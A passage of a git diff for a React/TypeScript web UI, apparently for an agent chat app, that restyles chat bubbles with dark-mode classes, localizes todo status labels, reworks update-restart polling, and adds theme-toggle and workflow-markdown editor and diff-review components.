-      <div className={`group relative ${!compact ? 'w-full' : ''} flex justify-end`}>
-        <div className={`relative flex flex-col items-end gap-2 ${messageGroupClass}`}>
+      <div className={`group relative ${!compact ? 'w-full' : ''} flex min-w-0 justify-end`}>
+        <div className={`flex min-w-0 items-start justify-end gap-2 ${messageGroupClass}`}>
+          <div className={`flex min-w-0 flex-col items-end ${isEditing ? 'w-full' : 'max-w-full'}`}>
+            {bubble}
+            {footer}
+          </div>
           <div className={getUserAvatarContainerClassName(compact)}>
             {avatar}
           </div>
-          <div aria-hidden="true" className={getUserAvatarSpacerClassName(compact)} />
-          <div className={`flex flex-col min-w-0 ${isEditing ? 'w-full' : 'w-fit max-w-full'}`}>
+        </div>
+        {previewImage && (
+          <ImageLightbox
+            src={previewImage.url}
+            alt={previewImage.alt}
+            onClose={() => setPreviewImage(null)}
+          />
+        )}
+      </div>
+    );
+  }
+
+  if (!compact) {
+    return (
+      <div className="group relative flex w-full min-w-0">
+        <div className="absolute -left-10 top-1">
+          {avatar}
+        </div>
+        <div className="flex w-full min-w-0 flex-col items-start">
+          <div className={`flex items-center gap-2 ${headerHeight}`}>
+            <span className="text-xs font-semibold text-zinc-700 dark:text-zinc-300">
+              {agentName}
+            </span>
+          </div>
+          <div className="flex w-full min-w-0 flex-col">
             {bubble}
             {footer}
           </div>
@@ -3280,12 +4179,12 @@ function ChatMessageBubbleInner({
   }
 
   return (
-    <div className={`group relative ${!compact ? 'w-full' : ''} flex`}>
+    <div className="group relative flex">
       <div className={`flex gap-2.5 ${messageGroupClass}`}>
         {avatar}
         <div className="flex flex-col items-start flex-1 min-w-0">
           <div className={`flex items-center gap-2 ${headerHeight}`}>
-            <span className="text-xs font-semibold text-zinc-700">
+            <span className="text-xs font-semibold text-zinc-700 dark:text-zinc-300">
               {agentName}
             </span>
           </div>
@@ -3333,6 +4232,7 @@ type TodoSummaryEntry = {
   status?: string;
   activeForm?: string;
 };
+type TodoTranslator = (key: string) => string;
 
 function isTodoSummaryEntry(value: unknown): value is TodoSummaryEntry {
   if (!value || typeof value !== 'object') return false;
@@ -3367,7 +4267,7 @@ function getTodoActionLabel(action: unknown): string {
   return 'Todos';
 }
 
-export function buildTodoSummary(state: Partial<ToolState>): string {
+export function buildTodoSummary(state: Partial<ToolState>, t?: TodoTranslator): string {
   const metadata = state.metadata ?? {};
   const currentTodos = pickTodoEntries(metadata.newTodos, metadata.todos, state.input?.todos);
   if (currentTodos.length === 0) return getTodoActionLabel(state.input?.action);
@@ -3381,42 +4281,80 @@ export function buildTodoSummary(state: Partial<ToolState>): string {
   let summary =
     terminalCount === totalCount
       ? hasCancelled
-        ? `Done ${terminalCount}/${totalCount}`
-        : `Completed ${terminalCount}/${totalCount}`
-      : `Progress ${terminalCount}/${totalCount}`;
+        ? `${t?.('chat.tool.todoSummary.done') ?? 'Done'} ${terminalCount}/${totalCount}`
+        : `${t?.('chat.tool.todoSummary.completed') ?? 'Completed'} ${terminalCount}/${totalCount}`
+      : `${t?.('chat.tool.todoSummary.progress') ?? 'Progress'} ${terminalCount}/${totalCount}`;
 
   if (inProgressCount > 0 && terminalCount < totalCount) {
-    summary += ` · In progress ${inProgressCount}`;
+    summary += ` · ${t?.('chat.tool.todoSummary.inProgress') ?? 'In progress'} ${inProgressCount}`;
   }
 
   return summary;
 }
 
-function todoStatusLabel(status: string | undefined): string {
+function todoStatusLabel(status: string | undefined, t: TodoTranslator): string {
   switch (status) {
     case 'completed':
-      return 'completed';
+      return t('chat.tool.todoStatus.completed');
     case 'in_progress':
-      return 'in progress';
+      return t('chat.tool.todoStatus.inProgress');
     case 'cancelled':
-      return 'cancelled';
+      return t('chat.tool.todoStatus.cancelled');
     case 'pending':
-      return 'pending';
+      return t('chat.tool.todoStatus.pending');
     default:
       return status || 'pending';
   }
 }
 
-function todoStatusClass(status: string | undefined): string {
+function todoStatusIcon(status: string | undefined): React.ReactNode {
   switch (status) {
     case 'completed':
-      return 'bg-emerald-50 text-emerald-700 border-emerald-100';
+      return (
+        <span className="flex h-4 w-4 items-center justify-center rounded-full bg-emerald-500 text-white">
+          <Check className="h-3 w-3" strokeWidth={3} />
+        </span>
+      );
+    case 'in_progress':
+      return (
+        <span className="flex h-4 w-4 items-center justify-center rounded-full border border-sky-400 bg-white">
+          <span className="h-1.5 w-1.5 rounded-full bg-sky-500" />
+        </span>
+      );
+    case 'cancelled':
+      return (
+        <span className="flex h-4 w-4 items-center justify-center rounded-full bg-zinc-200 text-zinc-500">
+          <X className="h-2.5 w-2.5" strokeWidth={2.5} />
+        </span>
+      );
+    default:
+      return <span className="h-4 w-4 rounded-full border border-zinc-300 bg-white" />;
+  }
+}
+
+function todoTextClass(status: string | undefined): string {
+  switch (status) {
+    case 'completed':
+      return 'text-zinc-500';
     case 'in_progress':
-      return 'bg-sky-50 text-sky-700 border-sky-100';
+      return 'font-medium text-zinc-800';
     case 'cancelled':
-      return 'bg-zinc-100 text-zinc-500 border-zinc-200';
+      return 'text-zinc-400 line-through decoration-zinc-300';
     default:
-      return 'bg-amber-50 text-amber-700 border-amber-100';
+      return 'text-zinc-600';
+  }
+}
+
+function todoStatusLabelClass(status: string | undefined): string {
+  switch (status) {
+    case 'completed':
+      return 'text-emerald-600';
+    case 'in_progress':
+      return 'text-sky-600';
+    case 'cancelled':
+      return 'text-zinc-400';
+    default:
+      return 'text-zinc-400';
   }
 }
 
@@ -3440,15 +4378,15 @@ export function ChatToolPart({ part, pendingQuestion, onAnswer, onReject }: Chat
   const state: Partial<ToolState> = part.state || {};
   const status = state.status || 'pending';
 
-  // Some tools block on an internal `question` call (for example safety
-  // confirmation inside `ssh_host_cmd`), so render the question UI whenever
-  // this running tool part has a pending question attached to it.
-  const isWaitingForAnswer = status === 'running' && !!pendingQuestion;
+  // Pending question state is the source of truth. Tool status can briefly
+  // arrive as completed after reconnects or transport races, but the user
+  // still needs the answer UI while the question request exists.
+  const isWaitingForAnswer = !!pendingQuestion;
 
   type StatusCfg = {
     icon: React.ReactNode;
     iconColor: string;
-    pill: string;      // 状态 pill 样式
+    pill: string;      // Status pill classes.
     label: string;
   };
   const statusConfig: Record<string, StatusCfg> = {
@@ -3489,18 +4427,22 @@ export function ChatToolPart({ part, pendingQuestion, onAnswer, onReject }: Chat
     ? pickTodoEntries(state.metadata?.newTodos, state.metadata?.todos, state.input?.todos)
     : [];
   const showGenericToolPayload = toolName !== 'todo';
+  const isTodoTool = toolName === 'todo';
 
   // Reuse the shared helpers so the truncation rules stay in sync with the
   // delegate-task card and any other places that render tool input previews.
   const inputSummary = state.input
     ? truncateToolDisplayText(
         toolName === 'todo'
-          ? buildTodoSummary(state)
+          ? buildTodoSummary(state, t)
           : buildToolInputSummary(state.input),
       )
     : '';
   const displayTitle = state.title ? truncateToolDisplayText(state.title) : '';
   const workflowHeaderSummary = truncateToolDisplayText(buildRunWorkflowHeaderSummary(toolName, state, t));
+  const statusBadgeClass = isTodoTool
+    ? 'text-[11px] font-medium text-zinc-500'
+    : `text-[11px] font-medium px-1.5 py-0.5 rounded-md ${config.pill}`;
 
   if (isWaitingForAnswer) {
     // Outer spacing is owned by the part wrapper in SessionChat's parts map.
@@ -3551,7 +4493,7 @@ export function ChatToolPart({ part, pendingQuestion, onAnswer, onReject }: Chat
           </div>
         </div>
         <div className="ml-auto flex items-center gap-1.5 flex-shrink-0 self-center">
-          <span className={`text-[11px] font-medium px-1.5 py-0.5 rounded-md ${config.pill}`}>
+          <span className={statusBadgeClass}>
             {config.label}
           </span>
           <ChevronDown className="w-3 h-3 text-zinc-400 transition-transform group-open/tool:rotate-180" />
@@ -3559,18 +4501,28 @@ export function ChatToolPart({ part, pendingQuestion, onAnswer, onReject }: Chat
       </summary>
 
       <div className="border-t border-zinc-200/60 px-2.5 py-2 space-y-1.5 text-xs">
-        {toolName === 'todo' && todoEntries.length > 0 && (
-          <div className="rounded-md border border-zinc-200 bg-white/70 px-2 py-1.5">
-            <div className="mb-1.5 text-[11px] font-medium text-zinc-500">{t('chat.tool.todoStages')}</div>
-            <div className="space-y-1">
+        {isTodoTool && todoEntries.length > 0 && (
+          <div className="space-y-1.5">
+            <div className="flex items-center justify-between gap-3 text-[11px] font-medium text-zinc-500">
+              <span>{t('chat.tool.todoStages')}</span>
+              <span className="font-normal text-zinc-400">{todoEntries.length}</span>
+            </div>
+            <div className="divide-y divide-zinc-100">
               {todoEntries.map((todo, index) => (
-                <div key={todo.id || index} className="flex items-start gap-2 text-[11px]">
-                  <span className="mt-1 h-1.5 w-1.5 flex-shrink-0 rounded-full bg-zinc-300" />
-                  <span className="min-w-0 flex-1 text-zinc-700">
+                <div
+                  key={todo.id || index}
+                  className="grid grid-cols-[16px_minmax(0,1fr)_auto] items-start gap-2 py-1.5 text-[11px] first:pt-0 last:pb-0"
+                >
+                  <span className="mt-0.5 flex h-4 w-4 flex-shrink-0 items-center justify-center">
+                    {todoStatusIcon(todo.status)}
+                  </span>
+                  <span className={`min-w-0 leading-5 ${todoTextClass(todo.status)}`}>
                     {todo.activeForm && todo.status === 'in_progress' ? todo.activeForm : todo.content}
                   </span>
-                  <span className={`flex-shrink-0 rounded-full border px-1.5 py-0.5 leading-none ${todoStatusClass(todo.status)}`}>
-                    {todoStatusLabel(todo.status)}
+                  <span
+                    className={`flex-shrink-0 whitespace-nowrap leading-5 ${todoStatusLabelClass(todo.status)}`}
+                  >
+                    {todoStatusLabel(todo.status, t)}
                   </span>
                 </div>
               ))}
@@ -3629,6 +4581,8 @@ export function ChatToolPart({ part, pendingQuestion, onAnswer, onReject }: Chat
 export const ChatMessageBubble = memo(ChatMessageBubbleInner, (prev, next) => {
   if (prev.isActive !== next.isActive) return false;
   if (prev.showActions !== next.showActions) return false;
+  if (prev.collapseIntermediateSteps !== next.collapseIntermediateSteps) return false;
+  if (prev.processGroupsDefaultOpen !== next.processGroupsDefaultOpen) return false;
   if (prev.editingMessageId !== next.editingMessageId) return false;
   if (prev.editingText !== next.editingText) return false;
   if (prev.actionsDisabled !== next.actionsDisabled) return false;
diff --git a/webui/src/components/common/ThemeToggle.tsx b/webui/src/components/common/ThemeToggle.tsx
new file mode 100644
index 000000000..6089a99bb
--- /dev/null
+++ b/webui/src/components/common/ThemeToggle.tsx
@@ -0,0 +1,33 @@
+import { Moon, Sun } from 'lucide-react';
+import { useContext } from 'react';
+import { useTranslation } from 'react-i18next';
+import { ThemeContext } from '@/contexts/ThemeContext';
+
+interface ThemeToggleProps {
+  collapsed?: boolean;
+}
+
+export default function ThemeToggle({ collapsed = false }: ThemeToggleProps) {
+  const { theme, toggleTheme } = useContext(ThemeContext);
+  const { t } = useTranslation('nav');
+  const isDark = theme === 'dark';
+  const Icon = isDark ? Sun : Moon;
+
+  return (
+    <button
+      type="button"
+      onClick={toggleTheme}
+      title={isDark ? t('switchToLightTheme') : t('switchToDarkTheme')}
+      aria-label={isDark ? t('switchToLightTheme') : t('switchToDarkTheme')}
+      aria-pressed={isDark}
+      className={`
+        flex items-center justify-center rounded-lg transition-colors
+        text-zinc-500 hover:bg-white/70 hover:text-zinc-900
+        dark:text-zinc-400 dark:hover:bg-zinc-800 dark:hover:text-zinc-100
+        ${collapsed ? 'h-8 w-8' : 'h-8 w-8'}
+      `}
+    >
+      <Icon className="h-4 w-4" />
+    </button>
+  );
+}
diff --git a/webui/src/components/common/UpdateModal.tsx b/webui/src/components/common/UpdateModal.tsx
index b9c5e29b8..ece1d658e 100644
--- a/webui/src/components/common/UpdateModal.tsx
+++ b/webui/src/components/common/UpdateModal.tsx
@@ -17,10 +17,10 @@ import {
 import { useTranslation } from 'react-i18next';
 import { checkUpdate, applyUpdate, VersionInfo, UpdateProgress, type UpdateEdition } from '@/api/update';
 import { getLocalizedReleaseNotes } from '@/utils/releaseNotes';
+import { checkRestartReadiness } from '@/utils/restartPolling';
 
 // ------------------------------------------------------------------ //
 
-const UPGRADE_PAGE_MARKER = 'flocks-upgrade-in-progress';
 const HEALTH_POLL_INTERVAL = 2000;
 const HEALTH_POLL_TIMEOUT = 5 * 60 * 1000;
 
@@ -54,6 +54,7 @@ export default function UpdateModal({ initialInfo, edition = 'flocks', canUpgrad
   // useRef avoids stale closure: the `restarting` value inside async callbacks
   // always reflects the latest state even after re-renders.
   const restartingRef = useRef(false);
+  const restartFailureReasonRef = useRef('');
   const setRestartingSync = (val: boolean) => {
     restartingRef.current = val;
     setRestarting(val);
@@ -98,6 +99,7 @@ export default function UpdateModal({ initialInfo, edition = 'flocks', canUpgrad
           return next;
         });
         if (progress.stage === 'restarting') {
+          restartFailureReasonRef.current = '';
           setRestartingSync(true);
           pollUntilReady();
         }
@@ -108,6 +110,8 @@ export default function UpdateModal({ initialInfo, edition = 'flocks', canUpgrad
       if (!restartingRef.current) {
         setError(e.message ?? t('upgradeFailed'));
         setUpgrading(false);
+      } else if (e?.message) {
+        restartFailureReasonRef.current = e.message;
       }
     }
   }, [edition, i18n.language, info, t]);
@@ -120,28 +124,22 @@ export default function UpdateModal({ initialInfo, edition = 'flocks', canUpgrad
 
   const pollUntilReady = () => {
     const start = Date.now();
+    let lastPollFailure = '';
     const poll = async () => {
       if (Date.now() - start > HEALTH_POLL_TIMEOUT) {
-        setError(t('restartTimeout'));
+        const reason = restartFailureReasonRef.current || lastPollFailure || t('restartUnknown');
+        setError(t('restartTimeout', { reason }));
         setRestartingSync(false);
         setUpgrading(false);
         return;
       }
 
-      try {
-        const rootResponse = await fetch('/', { cache: 'no-store' });
-        const rootHtml = await rootResponse.text();
-        const stillShowingUpgradePage = rootHtml.includes(UPGRADE_PAGE_MARKER);
-
-        if (rootResponse.ok && !stillShowingUpgradePage) {
-          const healthResponse = await fetch('/api/health', { cache: 'no-store' });
-          if (healthResponse.ok) {
-            window.location.reload();
-            return;
-          }
-        }
-      } catch {
+      const readiness = await checkRestartReadiness();
+      if (readiness.ready) {
+        window.location.reload();
+        return;
       }
+      lastPollFailure = readiness.reason || lastPollFailure;
 
       setTimeout(() => {
         void poll();
diff --git a/webui/src/components/common/WorkflowDocumentPanel.tsx b/webui/src/components/common/WorkflowDocumentPanel.tsx
new file mode 100644
index 000000000..34012c058
--- /dev/null
+++ b/webui/src/components/common/WorkflowDocumentPanel.tsx
@@ -0,0 +1,203 @@
+import type { ReactNode } from 'react';
+import ReactMarkdown from 'react-markdown';
+import { useTranslation } from 'react-i18next';
+import remarkGfm from 'remark-gfm';
+import { Download, Eye, FileText, Pencil, Save, Sparkles, Workflow as WorkflowIcon } from 'lucide-react';
+
+import WorkflowMarkdownEditor from './WorkflowMarkdownEditor';
+
+export type WorkflowDocumentMode = 'edit' | 'preview';
+
+interface WorkflowDocumentPanelProps {
+  editorId?: string;
+  mode: WorkflowDocumentMode;
+  value: string;
+  dirty: boolean;
+  saving: boolean;
+  resetDisabled?: boolean;
+  saveDisabled?: boolean;
+  generateWorkflowDisabled?: boolean;
+  error?: string | null;
+  diffReview?: ReactNode;
+  onModeChange: (mode: WorkflowDocumentMode) => void;
+  onChange: (value: string) => void;
+  onResetDocument: () => void;
+  onSave: () => void;
+  onGenerateWorkflow: () => void;
+  onDownload: () => void;
+}
+
+export default function WorkflowDocumentPanel({
+  editorId,
+  mode,
+  value,
+  dirty,
+  saving,
+  resetDisabled = false,
+  saveDisabled = false,
+  generateWorkflowDisabled = false,
+  error,
+  diffReview,
+  onModeChange,
+  onChange,
+  onResetDocument,
+  onSave,
+  onGenerateWorkflow,
+  onDownload,
+}: WorkflowDocumentPanelProps) {
+  const { t } = useTranslation('workflow');
+  const hasContent = value.trim().length > 0;
+
+  return (
+    <div className="absolute inset-0 flex flex-col bg-white">
+      <div className="flex flex-shrink-0 items-center justify-between gap-3 overflow-hidden border-b border-gray-200 px-4 py-2.5">
+        <div className="min-w-0">
+          <div className="flex items-center gap-2">
+            <FileText className="h-4 w-4 flex-shrink-0 text-gray-500" />
+            <h2 className="truncate text-sm font-semibold text-gray-900">{t('detail.editDocTitle')}</h2>
+            {dirty ? (
+              <span className="rounded bg-amber-50 px-1.5 py-0.5 text-[10px] font-medium text-amber-700">
+                {t('detail.editDocUnsaved')}
+              </span>
+            ) : null}
+          </div>
+          <p className="mt-0.5 truncate text-[11px] text-gray-400">workflow.md</p>
+        </div>
+
+        <div className="flex min-w-0 flex-shrink items-center gap-2 overflow-x-auto pb-0.5 [scrollbar-width:none] [&::-webkit-scrollbar]:hidden">
+          {error ? (
+            <span className="max-w-[180px] truncate rounded bg-red-50 px-2 py-1 text-[11px] font-medium text-red-600">
+              {error}
+            </span>
+          ) : null}
+          <div className="flex flex-shrink-0 rounded-lg border border-gray-200 bg-gray-50 p-0.5">
+            <button
+              type="button"
+              onClick={() => onModeChange('edit')}
+              className={`inline-flex h-9 flex-shrink-0 items-center gap-1.5 whitespace-nowrap rounded-md px-2.5 text-xs font-medium transition-colors ${
+                mode === 'edit'
+                  ? 'bg-white text-gray-900 shadow-sm'
+                  : 'text-gray-500 hover:text-gray-700'
+              }`}
+              title={t('detail.editDocModeEdit')}
+            >
+              <Pencil className="h-3.5 w-3.5" />
+              <span className="max-[560px]:hidden">{t('detail.editDocModeEdit')}</span>
+            </button>
+            <button
+              type="button"
+              onClick={() => onModeChange('preview')}
+              className={`inline-flex h-9 flex-shrink-0 items-center gap-1.5 whitespace-nowrap rounded-md px-2.5 text-xs font-medium transition-colors ${
+                mode === 'preview'
+                  ? 'bg-white text-gray-900 shadow-sm'
+                  : 'text-gray-500 hover:text-gray-700'
+              }`}
+              title={t('detail.editDocModePreview')}
+            >
+              <Eye className="h-3.5 w-3.5" />
+              <span className="max-[560px]:hidden">{t('detail.editDocModePreview')}</span>
+            </button>
+          </div>
+
+          <button
+            type="button"
+            onClick={onResetDocument}
+            disabled={resetDisabled}
+            className="inline-flex h-9 flex-shrink-0 items-center gap-1.5 whitespace-nowrap rounded-lg border border-gray-200 bg-white px-3 text-xs font-medium text-gray-600 shadow-sm transition-colors hover:bg-gray-50 hover:text-gray-900 disabled:cursor-not-allowed disabled:opacity-40 max-[560px]:px-2.5"
+            title={hasContent ? t('detail.regenerateEditDocTitle') : t('detail.generateEditDocTitle')}
+          >
+            <Sparkles className="h-3.5 w-3.5" />
+            <span className="max-[680px]:hidden">{hasContent ? t('detail.regenerateEditDoc') : t('detail.generateEditDoc')}</span>
+          </button>
+          <button
+            type="button"
+            onClick={onSave}
+            disabled={saveDisabled}
+            className="inline-flex h-9 flex-shrink-0 items-center gap-1.5 whitespace-nowrap rounded-lg bg-red-600 px-3 text-xs font-semibold text-white shadow-sm transition-colors hover:bg-red-700 disabled:cursor-not-allowed disabled:bg-gray-200 disabled:text-gray-400 disabled:shadow-none max-[560px]:px-2.5"
+            title={saving ? t('detail.editDocSaving') : t('detail.editDocSave')}
+          >
+            <Save className="h-3.5 w-3.5" />
+            <span className="max-[680px]:hidden">{saving ? t('detail.editDocSaving') : t('detail.editDocSave')}</span>
+          </button>
+          <button
+            type="button"
+            onClick={onGenerateWorkflow}
+            disabled={generateWorkflowDisabled}
+            className="inline-flex h-9 flex-shrink-0 items-center gap-1.5 whitespace-nowrap rounded-lg bg-slate-900 px-3 text-xs font-semibold text-white shadow-sm transition-colors hover:bg-slate-800 disabled:cursor-not-allowed disabled:bg-gray-200 disabled:text-gray-400 disabled:shadow-none max-[560px]:px-2.5"
+            title={t('detail.generateWorkflowTitle')}
+          >
+            <WorkflowIcon className="h-3.5 w-3.5" />
+            <span className="max-[760px]:hidden">{t('detail.generateWorkflow')}</span>
+          </button>
+        </div>
+      </div>
+
+      {mode === 'edit' ? (
+        diffReview ?? (
+          <div className="relative flex min-h-0 flex-1 overflow-hidden bg-slate-950">
+            {hasContent ? (
+              <FloatingDownloadButton tone="dark" onClick={onDownload} />
+            ) : null}
+            <div className="flex min-h-0 min-w-0 flex-1 overflow-hidden [&_textarea]:pr-48">
+              <WorkflowMarkdownEditor
+                id={editorId}
+                label={t('detail.editDocTextareaLabel')}
+                placeholder={t('detail.editDocPlaceholder')}
+                value={value}
+                onChange={onChange}
+              />
+            </div>
+          </div>
+        )
+      ) : hasContent ? (
+        <div className="relative min-h-0 flex-1 overflow-y-auto bg-white px-6 pb-6 pt-14">
+          <FloatingDownloadButton tone="light" onClick={onDownload} />
+          <div className="mx-auto max-w-3xl prose prose-sm prose-gray leading-relaxed">
+            <ReactMarkdown remarkPlugins={[remarkGfm]}>{value}</ReactMarkdown>
+          </div>
+        </div>
+      ) : (
+        <div className="flex min-h-0 flex-1 flex-col items-center justify-center gap-3 bg-gray-50 text-gray-400">
+          <FileText className="h-10 w-10 opacity-40" />
+          <p className="text-sm font-medium text-gray-500">{t('detail.editDocEmpty')}</p>
+          <p className="max-w-sm text-center text-xs leading-relaxed">{t('detail.editDocEmptyHint')}</p>
+          <button
+            type="button"
+            onClick={onResetDocument}
+            disabled={resetDisabled}
+            className="mt-1 inline-flex items-center gap-1.5 rounded-lg bg-red-600 px-3 py-1.5 text-xs font-semibold text-white shadow-sm transition-colors hover:bg-red-700 disabled:cursor-not-allowed disabled:bg-gray-200 disabled:text-gray-400 disabled:shadow-none"
+          >
+            <Sparkles className="h-3.5 w-3.5" />
+            {t('detail.generateEditDoc')}
+          </button>
+        </div>
+      )}
+    </div>
+  );
+}
+
+function FloatingDownloadButton({
+  tone,
+  onClick,
+}: {
+  tone: 'dark' | 'light';
+  onClick: () => void;
+}) {
+  const { t } = useTranslation('workflow');
+
+  return (
+    <button
+      type="button"
+      onClick={onClick}
+      className={
+        tone === 'dark'
+          ? 'absolute right-5 top-3 z-20 inline-flex max-w-[calc(100%-2.5rem)] items-center gap-1.5 rounded-lg border border-slate-700 bg-slate-800/95 px-3 py-1.5 text-xs font-medium text-slate-100 shadow-sm transition-colors hover:bg-slate-700'
+          : 'absolute right-5 top-3 z-20 inline-flex max-w-[calc(100%-2.5rem)] items-center gap-1.5 rounded-lg border border-gray-200 bg-white px-3 py-1.5 text-xs font-medium text-gray-700 shadow-sm transition-colors hover:bg-gray-50 hover:text-gray-900'
+      }
+      title={t('detail.downloadMdTitle')}
+    >
+      <Download className="h-3.5 w-3.5" />
+      {t('detail.downloadMd')}
+    </button>
+  );
+}
diff --git a/webui/src/components/common/WorkflowMarkdownDiffReview.tsx b/webui/src/components/common/WorkflowMarkdownDiffReview.tsx
new file mode 100644
index 000000000..eb3b3e5c8
--- /dev/null
+++ b/webui/src/components/common/WorkflowMarkdownDiffReview.tsx
@@ -0,0 +1,174 @@
+import { useMemo } from 'react';
+import { Check, GitCompare, Undo2 } from 'lucide-react';
+import { useTranslation } from 'react-i18next';
+import type { TextDiffHunk, TextDiffLine } from '@/utils/textDiff';
+
+interface WorkflowMarkdownDiffReviewProps {
+  lines: TextDiffLine[];
+  hunks: TextDiffHunk[];
+  added: number;
+  removed: number;
+  reviewingId: string | null;
+  disabled: boolean;
+  onAccept: () => void;
+  onReject: () => void;
+  onAcceptHunk: (hunk: TextDiffHunk) => void;
+  onRejectHunk: (hunk: TextDiffHunk) => void;
+}
+
+export default function WorkflowMarkdownDiffReview({
+  lines,
+  hunks,
+  added,
+  removed,
+  reviewingId,
+  disabled,
+  onAccept,
+  onReject,
+  onAcceptHunk,
+  onRejectHunk,
+}: WorkflowMarkdownDiffReviewProps) {
+  const { t } = useTranslation('workflow');
+  const hunkByStart = useMemo(() => {
+    const lookup = new Map<number, TextDiffHunk>();
+    hunks.forEach((hunk) => {
+      lookup.set(hunk.changeStartLineIndex, hunk);
+    });
+    return lookup;
+  }, [hunks]);
+
+  const rowClass = (line: TextDiffLine) => {
+    if (line.type === 'add') return 'bg-emerald-950/40 text-emerald-50';
+    if (line.type === 'remove') return 'bg-red-950/45 text-red-50';
+    return 'bg-slate-950 text-slate-200';
+  };
+  const gutterClass = (line: TextDiffLine) => {
+    if (line.type === 'add') return 'bg-emerald-950/70 text-emerald-300';
+    if (line.type === 'remove') return 'bg-red-950/70 text-red-300';
+    return 'bg-slate-900/70 text-slate-500';
+  };
+  const marker = (line: TextDiffLine) => {
+    if (line.type === 'add') return '+';
+    if (line.type === 'remove') return '-';
+    return ' ';
+  };
+
+  return (
+    <div
+      data-testid="workflow-md-diff-review"
+      className="flex min-h-0 flex-1 flex-col bg-slate-950 text-slate-100"
+    >
+      <div className="flex flex-shrink-0 flex-wrap items-center justify-between gap-3 border-b border-slate-800 bg-slate-900 px-4 py-2.5">
+        <div className="min-w-0">
+          <div className="flex min-w-0 items-center gap-2 text-xs text-slate-300">
+            <GitCompare className="h-3.5 w-3.5 flex-shrink-0 text-slate-400" />
+            <span className="font-medium text-slate-100">{t('detail.editDocDiffTitle')}</span>
+            <span className="text-slate-500">workflow.md</span>
+          </div>
+          <p className="mt-1 text-[11px] text-slate-400">
+            {t('detail.editDocDiffReviewDesc')}
+          </p>
+        </div>
+
+        <div className="flex flex-shrink-0 flex-wrap items-center justify-end gap-2">
+          <div className="flex items-center gap-2 text-[11px] font-medium">
+            <span className="rounded bg-emerald-500/15 px-1.5 py-0.5 text-emerald-300">
+              +{added} {t('detail.editDocDiffAdded')}
+            </span>
+            <span className="rounded bg-red-500/15 px-1.5 py-0.5 text-red-300">
+              -{removed} {t('detail.editDocDiffRemoved')}
+            </span>
+          </div>
+          <button
+            type="button"
+            onClick={onAccept}
+            disabled={disabled}
+            className="inline-flex items-center gap-1.5 rounded-md bg-emerald-500 px-2.5 py-1.5 text-xs font-semibold text-emerald-950 shadow-sm transition-colors hover:bg-emerald-400 disabled:cursor-not-allowed disabled:opacity-50"
+          >
+            <Check className="h-3.5 w-3.5" />
+            {t('detail.editDocDiffAccept')}
+          </button>
+          <button
+            type="button"
+            onClick={onReject}
+            disabled={disabled}
+            className="inline-flex items-center gap-1.5 rounded-md border border-red-400/40 bg-red-500/10 px-2.5 py-1.5 text-xs font-semibold text-red-200 shadow-sm transition-colors hover:bg-red-500/20 disabled:cursor-not-allowed disabled:opacity-50"
+          >
+            <Undo2 className="h-3.5 w-3.5" />
+            {reviewingId === 'reject' ? t('detail.editDocDiffRejecting') : t('detail.editDocDiffReject')}
+          </button>
+        </div>
+      </div>
+
+      <div className="min-h-0 flex-1 overflow-auto bg-slate-950">
+        <div className="min-w-[720px] font-mono text-sm leading-6">
+          {lines.length > 0 ? lines.map((line, index) => {
+            const hunk = hunkByStart.get(index);
+            const hunkIndex = hunk ? hunks.findIndex((item) => item.id === hunk.id) : -1;
+            return (
+              <div key={`${line.type}-${line.oldLine ?? ''}-${line.newLine ?? ''}-${index}`}>
+                {hunk && (
+                  <div className="flex flex-wrap items-center justify-between gap-2 border-y border-slate-800 bg-slate-900/95 px-4 py-2">
+                    <div className="flex min-w-0 items-center gap-2 text-xs text-slate-300">
+                      <span className="font-semibold text-slate-100">
+                        {t('detail.editDocDiffHunkTitle', { index: hunkIndex + 1 })}
+                      </span>
+                      <span className="rounded bg-emerald-500/15 px-1.5 py-0.5 text-[11px] font-medium text-emerald-300">
+                        +{hunk.added}
+                      </span>
+                      <span className="rounded bg-red-500/15 px-1.5 py-0.5 text-[11px] font-medium text-red-300">
+                        -{hunk.removed}
+                      </span>
+                    </div>
+                    <div className="flex flex-shrink-0 items-center gap-2">
+                      <button
+                        type="button"
+                        onClick={() => onAcceptHunk(hunk)}
+                        disabled={disabled}
+                        className="inline-flex items-center gap-1 rounded-md bg-emerald-500/15 px-2 py-1 text-[11px] font-semibold text-emerald-200 transition-colors hover:bg-emerald-500/25 disabled:cursor-not-allowed disabled:opacity-50"
+                      >
+                        <Check className="h-3 w-3" />
+                        {t('detail.editDocDiffAcceptHunk')}
+                      </button>
+                      <button
+                        type="button"
+                        onClick={() => onRejectHunk(hunk)}
+                        disabled={disabled}
+                        className="inline-flex items-center gap-1 rounded-md bg-red-500/15 px-2 py-1 text-[11px] font-semibold text-red-200 transition-colors hover:bg-red-500/25 disabled:cursor-not-allowed disabled:opacity-50"
+                      >
+                        <Undo2 className="h-3 w-3" />
+                        {reviewingId === `reject:${hunk.id}`
+                          ? t('detail.editDocDiffRejecting')
+                          : t('detail.editDocDiffRejectHunk')}
+                      </button>
+                    </div>
+                  </div>
+                )}
+                <div
+                  className={`grid grid-cols-[56px_56px_28px_minmax(0,1fr)] border-b border-slate-900/70 ${rowClass(line)}`}
+                >
+                  <div className={`select-none px-2 py-0.5 text-right ${gutterClass(line)}`}>
+                    {line.oldLine ?? ''}
+                  </div>
+                  <div className={`select-none px-2 py-0.5 text-right ${gutterClass(line)}`}>
+                    {line.newLine ?? ''}
+                  </div>
+                  <div className={`select-none px-2 py-0.5 text-center font-semibold ${gutterClass(line)}`}>
+                    {marker(line)}
+                  </div>
+                  <pre className="min-w-0 overflow-visible whitespace-pre-wrap break-words px-4 py-0.5 font-mono">
+                    {line.text || ' '}
+                  </pre>
+                </div>
+              </div>
+            );
+          }) : (
+            <div className="px-4 py-8 text-center text-sm text-slate-400">
+              {t('detail.editDocDiffEmpty')}
+            </div>
+          )}
+        </div>
+      </div>
+    </div>
+  );
+}
diff --git a/webui/src/components/common/WorkflowMarkdownEditor.tsx b/webui/src/components/common/WorkflowMarkdownEditor.tsx
new file mode 100644
index 000000000..df9124573
--- /dev/null
+++ b/webui/src/components/common/WorkflowMarkdownEditor.tsx
@@ -0,0 +1,66 @@
+import { useCallback, useEffect, useMemo, useRef } from 'react';
+
+interface WorkflowMarkdownEditorProps {
+  id?: string;
+  label: string;
+  placeholder?: string;
+  value: string;
+  onChange: (value: string) => void;
+}
+
+export default function WorkflowMarkdownEditor({
+  id = 'workflow-edit-doc',
+  label,
+  placeholder = '',
+  value,
+  onChange,
+}: WorkflowMarkdownEditorProps) {
+  const textareaRef = useRef<HTMLTextAreaElement | null>(null);
+  const lineNumberTrackRef = useRef<HTMLDivElement | null>(null);
